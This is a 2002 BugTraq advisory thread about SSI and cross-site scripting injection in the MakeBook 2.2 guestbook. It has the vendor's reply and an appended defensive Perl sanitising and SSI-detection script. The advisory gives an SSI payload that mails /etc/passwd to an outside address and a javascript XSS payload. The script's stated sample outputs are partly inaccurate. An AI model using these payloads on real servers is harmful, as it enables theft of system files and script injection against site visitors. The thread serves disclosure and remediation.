Re: SSI & CSS execution in MakeBook 2.2

2002-06-13 Thread Kristina Pfaff-Harris

In-Reply-To: [EMAIL PROTECTED]

Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5 
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 

Gah. This is embarrassing, especially since the original advisory about 
Matt's guestbook came out frigging years ago.

~sigh~

Name, email, and text entered are now checked more rigorously, which 
should fix this bug.  I've notified all registered users of the script to 
upgrade immediately.

The fix is a quick and ugly one, and does not allow for international 
characters in either the name or the email, and thus does not allow for 
several perfectly valid email addresses, but also should eliminate the 
vulnerability. Names now are stripped of everything but A-Za-z0-9-_.'
and emails of everything but A-Za-z0-9-_.@ .

Btw, and just as a side note, does anyone actually notify the writer of 
the script/software/whatever that has an exploit anymore? (I mean besides 
just posting to BugTraq?) It would have been nice to see a note about this 
before seeing it here. :-)

Kristina



SSI & CSS execution in MakeBook 2.2

2002-06-12 Thread DownBload



  [ DownBload Security Research Lab Advisory ]
[-]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5  
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002 
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




--[ Overview 

...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages.  It allows a user to enter their name, email address,
and some text which will then be added to the bookfile.  Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the book entries should appear, and even what pages they appear 
on...

--[ Problem 

Our dear Kristina wrote an advanced CGI guestbook, in Perl of course. 
It works fine, but trouble comes when you look for security measures in 
the program. When you want to sign the guestbook, you have to write your name,
email address, and some text. The script does remove 'some' special characters in 
$text, but the script doesn't replace special characters in $name at all, and 
because of that it is possible to enter and execute some SSI (Server 
Side Includes) or CSS (Cross Site Scripting) code instead of a name.
'Buggy' code:
...
$name  = $data{Name};      # taken verbatim: no filtering at all
$email = $data{Email};     # taken verbatim: no filtering at all
$text  = $data{Text};
$text  =~ s/</&lt;/g;      # only < and > are rewritten, and only in $text
$text  =~ s/>/&gt;/g;
...




--[ Examples

SSI attack
~~
Name: !--#exec cmd=/bin/mail [EMAIL PROTECTED]  /etc/passwd--
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~
Name: img src=javascript:alert('HACKED BY DOWNBLOAD');
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: the SSI attack depends on the web server, because some web servers
come with support for SSI and some without.




--[ Solution 

The solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{Name};
$name  =~ s/</&lt;/g;      # rewrite < and > so a <!--#exec ...--> or <img ...>
$name  =~ s/>/&gt;/g;      # in the name is displayed, not interpreted

$email = $data{Email};
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$text  = $data{Text};
$text  =~ s/</&lt;/g;
$text  =~ s/>/&gt;/g;
...




--[ Greetz

Greetz goes to #hr.hackers irc.carnet.hr.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.
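The following Perl script is added here as an illustration and is not part of either post or of MakeBook itself. It contrasts the < and > rewrite from the advisory's solution with a full HTML escape and with the allowlists Kristina describes in her reply, and adds a check an administrator can run over an already written bookfile to find entries that still carry an SSI directive. The names escape_html, clean_name, clean_email and contains_ssi are mine, and the sample entries are constructed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Full HTML escape. The advisory's fix only rewrites < and >, which is enough
# to stop a <!--#exec ...--> directive or an <img ...> tag from being parsed,
# but leaves & and quotes alone. & is escaped first to avoid double-escaping.
sub escape_html {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Allowlists using the exact character sets from Kristina's reply: anything
# outside the set is stripped, which also drops spaces and non-ASCII letters
# (the "quick and ugly" trade-off she mentions).
sub clean_name  { my ($s) = @_; $s =~ s/[^A-Za-z0-9\-_.']//g; return $s; }
sub clean_email { my ($s) = @_; $s =~ s/[^A-Za-z0-9\-_.@]//g; return $s; }

# Audit helper for an existing bookfile: returns 1 if a stored value still
# contains an SSI directive (standard mod_include directive names assumed),
# so entries submitted before the fix can be located and removed.
sub contains_ssi {
    my ($s) = @_;
    return $s =~ /<!--\s*#\s*(?:exec|include|echo|config|set|printenv|fsize|flastmod)\b/i ? 1 : 0;
}

# Constructed sample entries, modelled on the shapes in the advisory
my @entries = (
    { Name => 'Kristina',                        Email => 'kristina@example.com' },
    { Name => '<!--#exec cmd="id"-->',           Email => 'x@example.com' },
    { Name => "<img src=javascript:alert('x')>", Email => '"@example.com' },
);

for my $e (@entries) {
    printf "raw name:   %s\n", $e->{Name};
    printf "  ssi?      %d\n", contains_ssi($e->{Name});
    printf "  escaped:  %s\n", escape_html($e->{Name});
    printf "  cleaned:  %s | %s\n", clean_name($e->{Name}), clean_email($e->{Email});
}
```

Running it shows that the allowlist reduces the two hostile names to harmless fragments (e.g. "-exec" and "img.src"), while escape_html keeps the original text readable but inert; contains_ssi only fires on the second entry.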